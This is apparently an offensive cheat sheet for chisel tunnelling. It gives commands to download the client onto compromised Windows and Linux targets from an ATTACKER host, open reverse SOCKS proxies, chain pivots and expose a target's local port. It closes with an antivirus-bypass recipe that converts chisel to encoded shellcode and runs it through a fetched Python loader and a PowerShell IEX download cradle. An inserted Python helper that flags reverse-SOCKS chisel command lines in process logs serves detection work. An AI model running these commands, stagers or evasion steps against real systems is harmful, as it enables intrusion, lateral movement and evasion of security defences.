Chisel
Chisel Instance
I use only one instance to manage multiple proxy endpoints.
(replace bla:bla with your own random credentials if you want to)
docker run --name chisel --rm -d -p0.0.0.0:443:80 jpillora/chisel server --socks5 --reverse -v --auth bla:bla --port 80
docker inspect --format '{{ .NetworkSettings.IPAddress }}' chisel # Get container ip, probably 172.17.0.2
docker logs chisel -f # Stream logs
Target as Socks5
Upload chisel to the target and connect it back to the chisel server.
Don't forget to pass the same credentials here if you replaced them when starting the server.
POWERSHELL
(New-Object System.Net.WebClient).DownloadFile("http://ATTACKER/chisel.exe", "$env:TEMP\chisel.exe")
Start-Process -NoNewWindow -FilePath "$env:TEMP\chisel.exe" -ArgumentList "client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks"
CMD ALTERNATIVE
START "" "/users/user/chisel.exe" client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks
REM If you need to kill all chisel processes ...
REM taskkill /F /IM chisel.exe
Linux
wget http://ATTACKER/chisel -O /tmp/chisel;chmod 755 /tmp/chisel
/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks &
Great, our chisel container now listens on port 5000 as a SOCKS5 proxy!
Here is an example of how to use it with proxychains:
echo -e '[ProxyList]\nsocks5 172.17.0.2 5000'>/tmp/TARGET1
proxychains -q -f /tmp/TARGET1 crackmapexec smb TARGET_NETWORK
Target as Listener
You want the target to listen on a port and forward the traffic back to you?
Let's say you want to chain multiple chisel clients:
TARGET2 => TARGET1:7777 => ATTACKER:443
Linux
# Target1
chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443 &
# Target2 (socks5)
chisel client -v --auth bla:bla TARGET1IP:7777 R:0.0.0.0:6000:socks &
# Attacker
echo -e '[ProxyList]\nsocks5 172.17.0.2 6000'>/tmp/TARGET2
proxychains -q -f /tmp/TARGET2 crackmapexec smb TARGET2_NETWORK
Expose Target Local Port
The target is listening on localhost only and you want to reach that port remotely.
You bind a local port (here 8888 on the chisel container) and forward its traffic to the target's localhost:3306.
Linux
/root/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:8888:127.0.0.1:3306 &
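As an added example (not code from the original page), here is a small Python helper for the defender side of the three sections above: it parses the chisel remote syntax used there (R:host:port:socks, host:port:host:port) out of a "chisel client" command line as it would appear in a process-creation log, and flags the reverse-SOCKS form that turns the host into a pivot. SAMPLE_CMDLINES is constructed from this page's commands; only the flags used here (-v, --auth) are handled, which is an assumption of this helper.

```python
import shlex
from dataclasses import dataclass
from typing import List, Optional
@dataclass
class Remote:
    reverse: bool               # "R:" prefix: the listener opens on the chisel server side
    local_host: str
    local_port: int
    remote_host: Optional[str]  # None for a SOCKS remote
    remote_port: Optional[int]
    socks: bool
def parse_remote(spec: str) -> Remote:
    # Explicit forms used on this page: [R:]lhost:lport:rhost:rport and
    # [R:]lhost:lport:socks. Chisel's defaulted short forms (e.g. R:socks) are not handled.
    reverse = spec.startswith("R:")
    parts = (spec[2:] if reverse else spec).split(":")
    if parts[-1] == "socks" and len(parts) == 3:
        return Remote(reverse, parts[0], int(parts[1]), None, None, True)
    if len(parts) == 4:
        return Remote(reverse, parts[0], int(parts[1]), parts[2], int(parts[3]), False)
    raise ValueError(f"unsupported remote spec: {spec}")

def chisel_remotes(cmdline: str) -> List[Remote]:
    # Pull the remotes out of a "chisel client ..." command line as seen in a process log.
    # Only the page's flags (-v, --auth) are understood; first positional = server, rest = remotes.
    argv = shlex.split(cmdline)
    if "client" not in argv:
        return []
    args, positionals, i = argv[argv.index("client") + 1:], [], 0
    while i < len(args):
        if args[i] == "--auth":        # flag that takes a value: skip both tokens
            i += 2
        elif args[i].startswith("-"):  # boolean flag such as -v
            i += 1
        else:
            positionals.append(args[i])
            i += 1
    return [parse_remote(r) for r in positionals[1:]]

def exposes_socks_pivot(cmdline: str) -> bool:
    # A reverse SOCKS remote (R:...:socks) gives the chisel server a proxy into this host's network.
    return any(r.reverse and r.socks for r in chisel_remotes(cmdline))
# Constructed sample command lines (not real log data), using the forms shown above.
SAMPLE_CMDLINES = [
    "/tmp/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:5000:socks",
    "chisel client -v --auth bla:bla ATTACKER:443 TARGET1IP:7777:ATTACKER:443",
    "/root/chisel client -v --auth bla:bla ATTACKER:443 R:0.0.0.0:8888:127.0.0.1:3306",
    "/usr/bin/python3 -m http.server 8000",
]
```

Run over SAMPLE_CMDLINES, only the first entry is flagged: the chained forward and the local-port exposure open listeners too, but neither hands the server a SOCKS proxy.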
Win AV bypass
(You need the loadsc script https://offensive.run/winecosystem/lpe/README.html#av-bypass)
LHOST="192.168.45.216"
LPORT=443
PARAMS="client -v --auth bla:bla $LHOST:$LPORT R:0.0.0.0:5000:socks"
INPUT_FILE='/var/www/html/chisel.exe'
SHELLCODE_OUTPUT_FILE='/tmp/chiselsc'
ENCODED_PAYLOAD_FILE='/var/www/html/chiselsc'
python3 -c "import donut; donut.create(thread=0,compress=2,bypass=1,exit_opt=3,arch=2,file='$INPUT_FILE',output='$SHELLCODE_OUTPUT_FILE',params=bytes.fromhex('$( echo -en "$PARAMS" | xxd -plain | tr -d '\n' )').decode('utf-8'))"
cat "$SHELLCODE_OUTPUT_FILE" | xxd -plain | tr -d '\n' | rev | gzip | sudo tee "$ENCODED_PAYLOAD_FILE" >/dev/null
cat <<'EOF'|sudo tee /var/www/html/startchisel
$loadsc="$web/loadsc"; $sc="$web/chiselsc"; $python="$web/python.zip"; $dir="$env:TEMP";
$Exists = Test-Path "$dir\python\";If ($Exists -eq $False) {(New-Object Net.WebClient).DownloadFile($python ,"$dir\python.zip");Add-Type -assembly "system.io.compression.filesystem";[io.compression.zipfile]::ExtractToDirectory("$dir\python.zip", "$dir\python\")};
$arguments = @("-c","""import urllib.request as r;exec(bytes.fromhex(r.urlopen('$loadsc').read()[::-1].decode('utf-8')));load('$sc')""")
Start-Process -NoNewWindow -FilePath "$dir\python\python.exe" -ArgumentList $arguments
EOF
Then launch chisel:
$web="http://192.168.45.216";IEX(New-Object Net.WebClient).downloadString("$web/startchisel")